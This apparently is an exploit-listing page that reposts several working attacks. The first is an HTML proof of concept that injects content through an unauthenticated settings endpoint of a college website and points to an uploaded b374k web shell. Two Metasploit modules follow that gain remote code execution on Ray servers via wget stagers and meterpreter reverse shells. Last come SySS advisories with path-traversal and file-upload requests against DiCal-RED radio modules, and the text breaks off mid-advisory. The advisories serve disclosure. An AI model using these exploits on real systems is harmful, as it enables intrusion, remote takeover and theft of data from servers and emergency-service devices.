Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Part 01 : about-us.php [+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 . [+] Line 109 : Send the form data using fetch API (Set your target url) [+] save payload as poc.html [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Settings Management</title>  <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">  <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <style> /* Custom Styles */ #cimg { max-width: 100%; height: auto; } #preloader2 { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 9999; } .form-group { margin-bottom: 1rem; } .form-group label { display: block; margin-bottom: .5rem; } .form-group input, .form-group textarea { width: 100%; padding: .5rem; box-sizing: border-box; } </style> </head> <body> <div class="container"> <form id="manage-settings" method="post" enctype="multipart/form-data"> <div class="form-group"> <label for="name"> Name</label> <input type="text" id="name" name="name" required> </div> <div class="form-group"> <label for="email">Email</label> <input type="email" id="email" name="email" required> </div> <div class="form-group"> <label for="contact">Contact</label> <input type="tel" id="contact" name="contact" required> <div class="form-group"> <label for="about">About Content</label> <textarea class="text-jqte" id="about" name="about_us"></textarea> </div> <div class="form-group"> <label for="img">Cover Image</label> <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)"> <img id="cimg" src="" alt="Selected Image Preview"> </div> <button type="submit" class="btn btn-primary">Save Settings</button> </form> </div> <div class="modal fade" id="viewer_modal" role='dialog'> <div class="modal-dialog modal-md" role="document"> <div class="modal-content"> <button type="button" class="btn-close" data-dismiss="modal"></button> <img src="" alt=""> </div> </div> </div>  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>  <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script> function displayImg(input, _this) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function (e) { $('#cimg').attr('src', e.target.result); } reader.readAsDataURL(input.files[0]); } } $(document).ready(function () { const editorInstance = new FroalaEditor('.text-jqte'); }); $('#manage-settings').submit(function (e) { e.preventDefault(); start_load(); $.ajax({ url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', error: err => { console.log(err); }, success: function (resp) { if (resp == 1) { alert_toast('Data successfully saved.', 'success'); setTimeout(function () { location.reload(); }, 1000); } } }); }); window.start_load = function () { $('body').prepend('<div id="preloader2"></div>'); } window.end_load = function () { $('#preloader2').fadeOut('fast', function () { $(this).remove(); }); } window.viewer_modal = function ($src = '') { start_load(); var t = $src.split('.'); t = t[1]; if (t == 'mp4') { var view = $("<video src='" + $src + "' controls autoplay></video>"); } else { var view = $("<img src='" + $src + "' />"); } $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove(); $('#viewer_modal .modal-content').append(view); $('#viewer_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } window.uni_modal = function ($title = '', $url = '', $size = "") { start_load(); $.ajax({ url: $url, error: err => { console.log(err); alert("An error occurred"); }, success: function (resp) { if (resp) { $('#uni_modal .modal-title').html($title); $('#uni_modal .modal-body').html(resp); if ($size != '') { $('#uni_modal .modal-dialog').addClass($size); } else { $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md"); } $('#uni_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } } }); } window._conf = function ($msg = '', $func = '', $params = []) { $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")"); $('#confirm_modal .modal-body').html($msg); $('#confirm_modal').modal('show'); } window.alert_toast = function ($msg = 'TEST', $bg = 'success') { $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning'); if ($bg == 'success') $('#alert_toast').addClass('bg-success'); if ($bg == 'danger') $('#alert_toast').addClass('bg-danger'); if ($bg == 'info') $('#alert_toast').addClass('bg-info'); if ($bg == 'warning') $('#alert_toast').addClass('bg-warning'); $('#alert_toast .toast-body').html($msg); $('#alert_toast').toast({ delay: 3000 }).toast('show'); } </script> </body> </html> [+] Path : background: url(admin/assets/uploads/1724235960_b374k.php); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ray cpu_profile command injection', 'Description' => %q{ Ray RCE via cpu_profile command injection vulnerability. }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6019'], ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], ], 'CmdStagerFlavor' => %i[wget], 'Payload' => { 'DisableNops' => true }, 'Platform' => %w[linux], 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], [ 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', 'FETCH_COMMAND' => 'WGET' } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options( [ Opt::RPORT(8265), ] ) end def get_nodes res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') }) return unless res && res.code == 200 JSON.parse(res.body) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api/version') }) return Exploit::CheckCode::Unknown unless res && res.code == 200 ray_version = res.get_json_document['ray_version'] return Exploit::CheckCode::Unknown unless ray_version ray_version = Rex::Version.new(ray_version) return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3') @nodes = get_nodes return Exploit::CheckCode::Vulnerable unless @nodes.nil? Exploit::CheckCode::Appears end def exploit # We need to pass valid node info to /worker/cpu_profile for the server to process the request # First we list all nodes and grab the pid and ip of the first one (could be any) @nodes ||= get_nodes fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes first_node = @nodes['data']['summary'].first fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid') pid = first_node['agent']['pid'] fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') ip = first_node['ip'] print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") case target['Type'] when :nix_cmd execute_command(payload.encoded, { pid: pid, ip: ip }) else execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) end end def execute_command(cmd, opts = {}) send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), 'vars_get' => { 'pid' => opts[:pid], 'ip' => opts[:ip], 'duration' => 5, 'native' => 0, 'format' => "`#{cmd}`" } }) end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ray Agent Job RCE', 'Description' => %q{ RCE in Ray via the agent job submission endpoint. This is intended functionality as Ray's main purpose is executing arbitrary workloads. By default Ray has no authentication. }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-48022'], ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'] ], 'CmdStagerFlavor' => %i[wget], 'Payload' => { 'DisableNops' => true }, 'Platform' => %w[linux], 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], [ 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', 'FETCH_COMMAND' => 'WGET', 'MeterpreterTryToFork' => true } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options( [ Opt::RPORT(8265), ] ) end def get_job_data(cmd) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), 'data' => { 'entrypoint' => cmd }.to_json }) unless res && res.code == 200 res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), 'data' => { 'entrypoint' => cmd }.to_json }) end return unless res && res.code == 200 JSON.parse(res.body) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api/version') }) return Exploit::CheckCode::Unknown unless res && res.code == 200 ray_version = res.get_json_document['ray_version'] return Exploit::CheckCode::Unknown unless ray_version return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') @job_data = get_job_data('ls') return Exploit::CheckCode::Vulnerable unless @job_data.nil? Exploit::CheckCode::Appears end def exploit @job_data ||= get_job_data('ls') if @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") end case target['Type'] when :nix_cmd execute_command(payload.encoded) else execute_cmdstager({ flavor: :wget }) end end def execute_command(cmd, _opts = {}) get_job_data(cmd) end end </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-042 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36441 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to missing authentication checks, the device is vulnerable to the disclosure of sensitive information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The device provides a network server on TCP port 2101. This service does not seem to process any input, but it regularly sends data to connected clients. This includes operation messages when they are processed by the device. An unauthenticated attacker can therefore gain information about current emergency situations and possibly also emergency vehicle positions or routes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): $ telnet <IP or hostname> 2101 [Wait ...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-042 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-042.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd i5ZG5RAAgQx1MolkOvk+4nbY4vXjd6bkqa+9e0v1vw8Yu+9Mmb7AhLqz9sHSpe/Y bSGnVJowj57irXIYAjuAjXnczRuRVFgOZY+CS3+8aIi0uJ/xuaJh7OSBY6WKDMG1 S9voYYQ0QJBWxRBX/e+isTKag+XAAG3rBM9/B8S/kQOMXk+ikId0/l4iLici6MEg QxRRVOKBgq55zMePg9s42R+M14r+QtMm/8DV6syleaJfYMj/mAq1YDfqVaJms60j N2zb6dhlbnaz0xODV9Pjss3X7VvOgiHXtXTCU2CGlYIupNXAtbr0O5MZPGzrjeES CrvTfn2SidvxWIJ8n9ldVdL9vImikOdZ5KWrZsaUIdVaSYumyyKNFuW4dbgsd206 wXU04AH82azCa9uGybCNQwjuvLLReN9H2/hZS865FIf9JD46qyV7fcSbu70kOmbb u8mljYWV5cLUEmURj/K9IgSKueyHlVk8hR+seYP7KgYA3zpegbiuaMabLetPgqOT j9eleo1AOeDeNqpVoBAwEA2qZ2N1LI2IfrA3ZTXWIO6qMU/r40551/3wd6TC7Fa4 rypR9+7J371kSRn/eLYTOOqrnlteFOdcEPQbz3r/5wUWmIuNgcR/ipzPrZKsvaPb oXqB3PkjDORrKfXpBtT6oHmv7C0wRhZJgbeIhk7IYyfl8lebLps= =zVD2 -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-040 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Improper Authentication (CWE-287) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36444 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to improper authentication checks, the device is vulnerable to unauthorized access to logs and other files on the device's file system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The device allows viewing log files via the administrative web interface. This function does not require an authenticated session. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): As other parts of the administrative web interface do require authentication, a simple proof of concept is to log in to the web interface and navigate to the function to view log files. Log file contents are returned by a URL similar to http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22%22,%22FileAlias%22:%22FdmDebugPath%22,%22LinesMax%22:0} Using a local proxy to remove the QSESSIONID cookie from this request shows that the content is also returned when not sending any session information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-040 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-040.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd i5ZgGw/9GlpK9ZCfsFYDOaonfqTm0zPxu1CURL4gT2gnmcWKnvZMnSBVtI2qolR/ oyp8GMhBkQ5i1msTZXCBFTQfmxAjniNZ4hpg9nxY/9q7uThu8td2A89Ge9+qP7u0 06Z52kYGhMK+C5Ecoww9pOjNtL233B6300kSxxBh4wspAUw8NdOtnBO9zTiU8zcw MPjPsoHNofn6Ah1BRw40vkPTDGoKE9wD17nNJn0lnpgvP03ZLgEErk4gkvK0L1ts N33g1R0k2M3vKzhid9FUFE+OEFN4NdkmTUqylGU9uLEhtSZiZ5CT1kAcNp6PUOlA EmNqudfLngHVhyfTAVXhbJV8C/I9tCiktPiPD3g4sAP5FwsmnfKXvwULCABV7Y6I 6szsx1JPojyaYTi0hGKviJjewyEld9p7qLuCDt/Hq6BqkxaZkAN1JuyuqMLQDw8k ghIBzdqxCpaoa3r43Cg6mpiNzhe9cRYHDDSQ5wl+5nKI4NDy7xxaQd8psyg5CjCP CxgJTHne5zvFhtZP7LFa82R3Yux6x6k2XcxbsgoBaBYXS9Qj+QKLU5HxbZVbVwWS c0kZzHWWydiaqSfXl5OZDPZIcOZH3C95kXFY78XMOhndqg9yW7ot3OJ/RR5GfX1X jqcbLv9k0XCRr55bH/vcLWoJw9oGxfX25FlH2Sp7VYiaIohd8cM= =Iaf1 -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-039 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36442 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to a path traversal issue, the device is vulnerable to the disclosure of arbitrary files and modification of system files, effectively leading to remote code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The administrative web interface of the device is vulnerable to path traversal attacks in several places. The functions to download or display log files can be used to access arbitrary files on the device's file system. The upload function for new license files can be used to write files anywhere on the device's file system - possibly overwriting important system configuration files, binaries or scripts. Replacing files that are executed during system operation results in a full compromise of the whole device. Note that the attacker needs to be authenticated in order to exploit these vulnerabilities, i.e. know the administrative system password or its MD5 hash (cf. SYSS-2024-038). However, due to another vulnerability (cf. SYSS-2024-040), authentication is not required to display file contents. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can download the file /etc/deviceconfig via the following URL: http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22} Alternatively, the same file can be viewed via http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22} The following HTTP POST request uploads a file to the root directory (/) of the device's file system: POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1 Host: 192.0.2.1 Content-Length: 190 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5 [...] Cookie: QSESSIONID=[...] ------WebKitFormBoundarynMcoPJ7jKTghQbK5 Content-Disposition: form-data; name="binary"; filename="../poc.txt" Content-Type: text/plain PoC ------WebKitFormBoundarynMcoPJ7jKTghQbK5-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-039 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd i5Z0/Q//URU2aC1Di8bK/CntBDFfjMk+fD0nXKwo7C/GSOy41y7xBlz9e9UzJKPP fI7fa8RQkbZDlDzpTQHXbvpSocbahWIM62B+c7uGm1EGZyejn7IpJUSbhRZHzKqM sNukpHq10p/AA6BJn4baFgfFIdV+HzXPAm3bkxovL3pUmMYVgFsfzuzpZ3wOqKbn M276mEmsBDG2Yi7HqWetqtYAjb35DVokrug+uT8DDe3SSE9V16iqo8EqMqMBXD7L aCvVnnVl1ElqJSsIyClyXLoKLcWbBN4zAUlb6f90PEeUtNt5/qhRiLDzprum8BYo 7DhMz8MwOTTijNKRcYpVkOfPg1htmdUe5JqElktGcfNDj5YvU4KzG89srigHreJP yIVM+J0VX4fQ28cjKTS/qyXOAeIqJq//3/vbsgA3YNlP+IPBZYav8//HEPJD1PiD fBlwhQ7skn/EaCBi8EMatu7/xymA34rnTmmqS5+MCViWcTTB2+fF7H2xhZl1biHD DcVMVGgbNAdRIYFkJAh6qg0sXd1VOb8etAhFRQmMt5MeSK+ErbAIiaWTot2wwvbS jbTsEG+VL0HTIfEI/utghGDB+044hJceEyaqRJ/qq/3Zx1C13ZsKLPeXZaMoeEWM 1nYLOJFL/R/i+UjFsFzxDG/IcbionJYOTvULa4vPafdZQ6Yol80= =BeZD -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-038 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Use of Password Hash Instead of Password for Authentication (CWE-836) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36439 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to the use of a password hash instead of a password for authentication, the device is vulnerable to unauthorized access to administrative functionality. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The device provides an administrative web interface that requests the administrative system password before it can be used. Instead of submitting the user-supplied password, its MD5 hash is calculated on the 